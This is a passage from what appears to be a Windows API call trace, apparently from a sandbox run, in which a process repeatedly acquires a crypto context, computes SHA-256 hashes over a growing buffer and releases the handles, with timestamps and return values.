dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0190.214] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.214] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad00e0 [0190.214] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32ad00e0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad00e0, pdwDataLen=0xce0bc) returned 1 [0190.214] CryptDestroyHash (hHash=0x3396f580) returned 1 [0190.214] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0190.214] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338235d0) returned 1 [0190.216] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.216] CryptHashData (hHash=0x3396eda0, pbData=0x32349170, dwDataLen=0x300, dwFlags=0x0) returned 1 [0190.216] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.216] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0500 [0190.216] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32ad0500, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0500, pdwDataLen=0xce0bc) returned 1 [0190.216] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0190.216] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0190.216] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338226d0) returned 1 [0190.217] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.217] CryptHashData (hHash=0x3396ea90, pbData=0x32349170, dwDataLen=0x320, dwFlags=0x0) returned 1 [0190.217] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.217] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfc30 [0190.217] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32acfc30, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfc30, pdwDataLen=0xce0bc) returned 1 [0190.217] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0190.217] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0190.217] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338222d0) returned 1 [0190.218] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.218] CryptHashData (hHash=0x3396ef60, pbData=0x32349170, dwDataLen=0x340, dwFlags=0x0) returned 1 [0190.218] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.218] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfb70 [0190.218] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x2, pbData=0x32acfb70, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfb70, pdwDataLen=0xce0bc) returned 1 [0190.218] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0190.218] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0190.218] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338231d0) returned 1 [0190.219] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.219] CryptHashData (hHash=0x3396f0b0, pbData=0x32349170, dwDataLen=0x360, dwFlags=0x0) returned 1 [0190.219] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.219] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad04d0 [0190.219] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32ad04d0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad04d0, pdwDataLen=0xce0bc) returned 1 [0190.219] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0190.219] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0190.219] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338223d0) returned 1 [0190.219] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.219] CryptHashData (hHash=0x3396f820, pbData=0x32349170, dwDataLen=0x380, dwFlags=0x0) returned 1 [0190.219] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.219] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfcf0 [0190.219] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32acfcf0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfcf0, pdwDataLen=0xce0bc) returned 1 [0190.219] CryptDestroyHash (hHash=0x3396f820) returned 1 [0190.219] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0190.219] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338239d0) returned 1 [0190.220] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.220] CryptHashData (hHash=0x3396ea90, pbData=0x32349170, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0190.220] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.220] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfdb0 [0190.220] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32acfdb0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfdb0, pdwDataLen=0xce0bc) returned 1 [0190.220] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0190.220] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0190.220] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821fd0) returned 1 [0190.221] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.221] CryptHashData (hHash=0x3396ea20, pbData=0x32349170, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0190.221] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.221] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0560 [0190.221] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32ad0560, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0560, pdwDataLen=0xce0bc) returned 1 [0190.221] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0190.221] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0190.221] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338234d0) returned 1 [0190.221] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.221] CryptHashData (hHash=0x3396f200, pbData=0x32349170, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0190.221] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.221] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad05f0 [0190.221] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x2, pbData=0x32ad05f0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad05f0, pdwDataLen=0xce0bc) returned 1 [0190.221] CryptDestroyHash (hHash=0x3396f200) returned 1 [0190.221] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0190.221] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821fd0) returned 1 [0190.222] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.222] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x400, dwFlags=0x0) returned 1 [0190.222] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.222] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfc00 [0190.222] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32acfc00, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfc00, pdwDataLen=0xce0bc) returned 1 [0190.222] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.222] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0190.222] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338231d0) returned 1 [0190.223] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.223] CryptHashData (hHash=0x3396eb70, pbData=0x32349170, dwDataLen=0x420, dwFlags=0x0) returned 1 [0190.223] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.223] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad03e0 [0190.223] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x2, pbData=0x32ad03e0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad03e0, pdwDataLen=0xce0bc) returned 1 [0190.223] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0190.223] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0190.223] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338223d0) returned 1 [0190.223] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.223] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x440, dwFlags=0x0) returned 1 [0190.223] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.223] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad01d0 [0190.223] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad01d0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad01d0, pdwDataLen=0xce0bc) returned 1 [0190.223] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.223] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0190.223] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338237d0) returned 1 [0190.224] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.224] CryptHashData (hHash=0x3396f3c0, pbData=0x32349170, dwDataLen=0x460, dwFlags=0x0) returned 1 [0190.224] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.224] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad06e0 [0190.224] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32ad06e0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad06e0, pdwDataLen=0xce0bc) returned 1 [0190.224] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0190.224] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0190.224] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ed0) returned 1 [0190.225] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.225] CryptHashData (hHash=0x3396f200, pbData=0x32349170, dwDataLen=0x480, dwFlags=0x0) returned 1 [0190.225] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.225] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acff90 [0190.225] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x2, pbData=0x32acff90, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acff90, pdwDataLen=0xce0bc) returned 1 [0190.225] CryptDestroyHash (hHash=0x3396f200) returned 1 [0190.225] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0190.225] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822dd0) returned 1 [0190.225] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.225] CryptHashData (hHash=0x3396eb00, pbData=0x32349170, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0190.225] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.225] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0320 [0190.225] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x2, pbData=0x32ad0320, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0320, pdwDataLen=0xce0bc) returned 1 [0190.225] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0190.225] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0190.225] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.226] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.226] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0190.226] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.226] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad02f0 [0190.226] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32ad02f0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad02f0, pdwDataLen=0xce0bc) returned 1 [0190.226] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.226] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.226] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.227] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.227] CryptHashData (hHash=0x3396f890, pbData=0x32349170, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0190.227] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.227] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfd20 [0190.227] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32acfd20, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfd20, pdwDataLen=0xce0bc) returned 1 [0190.227] CryptDestroyHash (hHash=0x3396f890) returned 1 [0190.227] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.227] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338236d0) returned 1 [0190.227] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.227] CryptHashData (hHash=0x3396f5f0, pbData=0x32349170, dwDataLen=0x500, dwFlags=0x0) returned 1 [0190.227] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.227] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0080 [0190.228] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32ad0080, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0080, pdwDataLen=0xce0bc) returned 1 [0190.228] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0190.228] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0190.228] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338239d0) returned 1 [0190.228] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.228] CryptHashData (hHash=0x3396ef60, pbData=0x32349170, dwDataLen=0x520, dwFlags=0x0) returned 1 [0190.228] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.228] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfbd0 [0190.228] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x2, pbData=0x32acfbd0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfbd0, pdwDataLen=0xce0bc) returned 1 [0190.233] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0190.233] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0190.233] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338235d0) returned 1 [0190.233] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.233] CryptHashData (hHash=0x3396f820, pbData=0x32349170, dwDataLen=0x540, dwFlags=0x0) returned 1 [0190.233] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.233] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0650 [0190.233] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32ad0650, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0650, pdwDataLen=0xce0bc) returned 1 [0190.233] CryptDestroyHash (hHash=0x3396f820) returned 1 [0190.233] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0190.233] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338220d0) returned 1 [0190.234] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.234] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x560, dwFlags=0x0) returned 1 [0190.234] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.234] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0680 [0190.234] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad0680, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0680, pdwDataLen=0xce0bc) returned 1 [0190.234] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.234] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0190.234] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338221d0) returned 1 [0190.235] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.235] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x580, dwFlags=0x0) returned 1 [0190.235] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.235] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfe10 [0190.235] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32acfe10, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfe10, pdwDataLen=0xce0bc) returned 1 [0190.235] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.235] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0190.235] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338231d0) returned 1 [0190.235] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.235] CryptHashData (hHash=0x3396eb70, pbData=0x32349170, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0190.235] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.235] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad06b0 [0190.235] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x2, pbData=0x32ad06b0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad06b0, pdwDataLen=0xce0bc) returned 1 [0190.235] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0190.235] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0190.236] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338220d0) returned 1 [0190.236] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.236] CryptHashData (hHash=0x3396efd0, pbData=0x32349170, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0190.236] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.236] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfc60 [0190.236] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x2, pbData=0x32acfc60, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfc60, pdwDataLen=0xce0bc) returned 1 [0190.236] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0190.236] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0190.236] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338233d0) returned 1 [0190.237] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.237] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0190.237] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.237] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0350 [0190.237] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad0350, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0350, pdwDataLen=0xce0bc) returned 1 [0190.237] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.237] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0190.237] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338220d0) returned 1 [0190.237] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.238] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x600, dwFlags=0x0) returned 1 [0190.238] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, 